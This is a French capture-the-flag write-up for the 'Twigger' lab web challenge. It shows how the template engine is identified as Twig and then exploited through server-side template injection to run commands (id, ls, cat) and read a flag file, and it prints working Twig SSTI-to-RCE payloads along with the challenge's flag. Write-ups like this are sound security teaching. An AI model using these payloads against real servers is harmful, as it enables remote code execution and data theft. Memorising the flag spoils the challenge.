# WRITEUP WEB / TWIGGER
## Consignes :

Vous avez été mandaté pour réaliser un test de vulnérabilités sur le site web de la société **Twigger**

Accès au site :  http://game1.marshack.fr:42084

> Format du flag : fl@g{...}

## Pièce(s)  jointe(s) :

```
Néant
```

## Serveur :
```
Docker
```

## Points attribués :

```
40
```

## Hint :

```

```

## Flag :

```
 fl@g{templ4t3_s1d3_inj3ct10n_1s_b4d}
```


# writeup

Le site web est composé d'une page web en construction.

Connexion :
```
http://game1.marshack.fr:42084
```

![](img-writeup_web_twigger/image-01.png)

On commence à faire des tests d'injection afin d'identifier le moteur de template utilisé.

En utilisant l'arbe de décision ci-dessous, on identifie qu'il s'agit du moteur de template **twig** ou **jinja2**


![](img-writeup_web_twigger/image-02.png)

Injection de 
```
${7*7}       <==   ne fonctionne pas
{{7*7}}      <==   fonctionne 
{{7*'7'}}    <==   fonctionne 
```

![](img-writeup_web_twigger/image-03.png)

On peut constater que la chaine est interprétée par **twig** car on obtient **49**
au lieu de **7777777** (chaine retournée lorsqu'il s'agit de **jinja2**)

Le moteur étant identifié, on peut tenter diverses commandes d'injection au format **twig**.

1er injection :
 Objectif: confirmer que l'injection de commande fonctionne.  On exécute la commande **id**

 ```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 ```


![](img-writeup_web_twigger/image-04.png)

2ième injection:
 Objectif : énumération des fichiers présent sur la machine
```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("echo `ls /`")}}
```

![](img-writeup_web_twigger/image-05.png)

On remarque la présence d'un répertoire appelé : **secret**

3ieme injection :
 Objectif : affichage du contenu du répertoire secret
```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("echo `ls /secret`")}}
```


![](img-writeup_web_twigger/image-06.png)

Dans le répertoire **secret** , présence d'un fichier appelé : **flag.txt**

Quatrième injection : 
 Objectif : affichage du contenu du fichier **flag.txt**
```
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("echo `cat /secret/flag.txt`")}}
```


![](img-writeup_web_twigger/image-07.png)

Le flag est : fl@g{templ4t3_s1d3_inj3ct10n_1s_b4d}

<!-- Review Taz : 20230322 --> 